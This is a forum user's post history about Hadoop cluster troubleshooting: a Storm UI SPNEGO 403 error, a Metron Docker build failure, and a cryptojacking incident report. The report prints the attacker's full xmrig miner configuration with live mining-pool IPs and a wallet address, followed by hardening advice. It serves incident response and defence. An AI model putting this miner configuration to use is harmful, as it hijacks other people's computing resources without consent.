Member since: 02-02-2018
Posts: 6
Kudos Received: 2
Solutions: 0
09-14-2018
02:30 PM
We have a Kerberized HDP cluster (2.6.5) deployed in AWS. The AWS network architecture places all HDP component nodes in a private subnet, reachable only over SSH through a bastion node in a public subnet. We have exposed the web components (Storm UI, Metron UI, Metron Management UI, etc.) to the outside world through an AWS ELB load balancer. The Kerberos server and KDC admin are reachable externally via SSH tunneling through the bastion node, so that external clients can authenticate (e.g. SPNEGO). When we access the Storm UI in a browser, with the steps below taken to pass SPNEGO authentication, we get a 403 error even with the correct keytab and principal.

Error in /var/log/storm/ui.out on the node hosting the Storm UI:

Found KeyTab /etc/security/keytabs/spnego.service.keytab for HTTP/sdssystemmaster2@EXAMPLE.COM
Looking for keys for: HTTP/sdssystemmaster2@EXAMPLE.COM
Found unsupported keytype (3) for HTTP/sdssystemmaster2@EXAMPLE.COM
MemoryCache: add 1536315369/301662/8ABC886166F6808EA668D561462EDD37/metron@EXAMPLE.COM to metron@HOST

Steps followed:

1. Installed the Kerberos client.
2. Copied the krb5.conf file from the Kerberos node to a local krb5.ini and configured it:

[libdefaults]
renew_lifetime = 7d
forwardable = true
default_realm = EXAMPLE.COM
ticket_lifetime = 24h
dns_lookup_realm = false
dns_lookup_kdc = false
default_ccache_name = /tmp/krb5cc_%{uid}
#default_tgs_enctypes = aes des3-cbc-sha1 rc4 des-cbc-md5
#default_tkt_enctypes = aes des3-cbc-sha1 rc4 des-cbc-md5
[logging]
default = FILE:/var/log/krb5kdc.log
admin_server = FILE:/var/log/kadmind.log
kdc = FILE:/var/log/krb5kdc.log
[realms]
EXAMPLE.COM = {
admin_server = localhost
kdc = localhost
}

3. Copied the keytab file spnego.service.keytab for the principal HTTP/sdssystemmaster2@EXAMPLE.COM.
4. Ran kinit; the ticket seems to be generated fine (screenshot added).
5. Configured Firefox via about:config:
network.negotiate-auth.trusted-uris : loadbalancer-url
network.negotiate-auth.delegation-uris : loadbalancer-url
network.negotiate-auth.gsslib : C:\Program Files\MIT\Kerberos\bin\gssapi64.dll
network.negotiate-auth.using-native-gsslib : false

6. Loaded the Storm UI.

Storm UI SPNEGO Kerberos configuration:
ui.filter : org.apache.hadoop.security.authentication.server.AuthenticationFilter
ui.filter.params : {'type': 'kerberos', 'kerberos.principal': '{{storm_ui_jaas_principal}}', 'kerberos.keytab':'{{storm_ui_keytab_path}}' , 'kerberos.name.rules': 'DEFAULT'}
storm_ui_keytab : /etc/security/keytabs/spnego.service.keytab
storm_ui_principal_name : HTTP/_HOST@EXAMPLE.COM
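The "Found unsupported keytype (3)" line in ui.out is worth chasing: enctype 3 is single-DES (des-cbc-md5), which the JVM rejects by default. A minimal sketch of how to inspect and fix this, assuming kadmin access as admin/admin (that principal name is an assumption; use your own):

```shell
# List the encryption types stored in the SPNEGO keytab;
# "unsupported keytype (3)" in the log corresponds to des-cbc-md5.
klist -kte /etc/security/keytabs/spnego.service.keytab

# If DES entries are listed, re-export the keytab with AES-only enctypes.
# Caution: ktadd generates new keys (the kvno increases), so redistribute
# the refreshed keytab to every host that uses it afterwards.
kadmin -p admin/admin -q "ktadd -k /etc/security/keytabs/spnego.service.keytab \
  -e aes256-cts-hmac-sha1-96:normal,aes128-cts-hmac-sha1-96:normal \
  HTTP/sdssystemmaster2@EXAMPLE.COM"
```

For AES-256 to work on the Java side, the JCE unlimited-strength policy files must be installed in the JDK used by Storm; alternatively, `allow_weak_crypto = true` under `[libdefaults]` lets DES through, but dropping the DES keys is the safer fix.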
Labels:
- Apache Storm
08-03-2018
07:25 AM
2 Kudos
Thank you @Sindhu and @Rakesh S. I did a root-cause analysis and found that our server is hosted in AWS, a public cloud, and we had not set up Kerberos or firewalls. On the nodes I can find the process w.conf running:

yarn 21775 353 0.0 470060 12772 ? Ssl Aug02 5591:25 /var/tmp/java -c /var/tmp/w.conf

Within /var/tmp I can see a config.json which contains:

{
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
"av": 0, // algorithm variation, 0 auto select
"background": true, // true to run the miner in the background
"colors": true, // false to disable colored output
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
"cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
"donate-level": 1, // donate level, mininum 1%
"log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
"max-cpu-usage": 95, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
"print-time": 60, // print hashrate report every N seconds
"retries": 5, // number of times to retry before switch to backup server
"retry-pause": 5, // time to pause between retries
"safe": false, // true to safe adjust threads and av settings for current CPU
"threads": null, // number of miner threads
"pools": [
{
"url": "158.69.133.20:3333", // URL of mining server
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", // username for mining server
"pass": "x", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false // enable nicehash/xmrig-proxy support
},
{
"url": "192.99.142.249:3333", // URL of mining server
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", // username for mining server
"pass": "x", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false // enable nicehash/xmrig-proxy support
},
{
"url": "202.144.193.110:3333", // URL of mining server
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", // username for mining server
"pass": "x", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false // enable nicehash/xmrig-proxy support
}
],
"api": {
"port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API
"access-token": null, // access token for API
"worker-id": null // custom worker-id for API
}
}

This clearly shows a crypto-mining attack on our system. Worst of all, the files were created and the processes were running with root permissions. Although I could not confirm the root cause, my guess is that an attacker reached our unprotected/unrestricted port 8088, identified that the cluster was not Kerberized, brute-forced our root password, logged in to our AWS cluster, and gained full access.

Conclusion:
1. Enable Kerberos, add Knox, and secure your servers.
2. Enable a VPC.
3. Refine the security groups to whitelist only the IPs and ports needed for HTTP and SSH.
4. Use strong passwords on public clouds.
5. Change the default static user in Hadoop: Ambari > HDFS > Configurations > Custom core-site > Add Property hadoop.http.staticuser.user=yarn
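As a first containment step, the process and dropped files named above can be located and outbound traffic to the pool addresses from config.json blocked. A minimal sketch (the iptables rules are only printed here for review; run them as root after checking them, and rebuild the host from a clean image afterwards, since a root-level compromise cannot be reliably cleaned in place):

```shell
# Look for the miner process from the ps output above
# (the bracketed [w] keeps grep from matching its own command line).
ps aux | grep '[w]\.conf' && echo "miner process found" || echo "miner process not found"

# Check for the dropped files reported in /var/tmp.
ls -l /var/tmp/java /var/tmp/w.conf /var/tmp/config.json 2>/dev/null

# Print iptables rules blocking the three pool endpoints from config.json.
for pool in 158.69.133.20 192.99.142.249 202.144.193.110; do
  echo iptables -A OUTPUT -d "$pool" -p tcp --dport 3333 -j DROP
done
```

Blocking the pools only stops the bleeding; the security-group whitelist in point 3 above is what prevents re-entry.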
08-03-2018
04:53 AM
Labels:
- Apache Hadoop
- Apache YARN
07-13-2018
06:15 AM
@Irshad Muhammed Yes, Metron Docker works like a charm on Windows. Thanks for the workaround.
07-11-2018
09:33 AM
We tried installing Metron Docker on Windows 10. We installed JDK 1.8, Python 2.7, Visual Studio C++ Build Tools 2015, Maven 3.5, and Git. The environment variables and PATH have been set correctly, and we cloned Metron from GitHub. But when we run "mvn clean install -DskipTests", the installation exits with this error:

[ERROR] Failed to execute goal com.github.eirslett:frontend-maven-plugin:1.3:npm (npm install) on project metron-config: Failed to run task: 'npm install' failed. (error code 1) -> [Help 1]
[ERROR]
[ERROR] To see the full stack trace of the errors, re-run Maven with the -e switch.
[ERROR] Re-run Maven using the -X switch to enable full debug logging.
[ERROR]
[ERROR] For more information about the errors and possible solutions, please read the following articles:
[ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoFailureException
[ERROR]
[ERROR] After correcting the problems, you can resume the build with the command
[ERROR] mvn <goals> -rf :metron-config

If anybody has faced this error before, please let me know the resolution.
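The Maven summary hides the actual npm error. A sketch of how to surface it and clear the usual culprits, assuming the standard Metron source layout where the module lives under metron-interface/metron-config (treat the cleanup steps as things to try, not a confirmed fix):

```shell
# Resume from the failing module with full stack traces and debug logging
# so the underlying npm error message is visible.
mvn -e -X clean install -DskipTests -rf :metron-config

# If 'npm install' still fails, remove the module's partially installed
# dependencies so the frontend-maven-plugin starts from a clean state.
rm -rf metron-interface/metron-config/node_modules
mvn clean install -DskipTests -rf :metron-config
```

On Windows, overly long paths under node_modules and a proxy blocking the npm registry are common causes; the -X output should show which one applies.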
Labels:
- Apache Metron
- Docker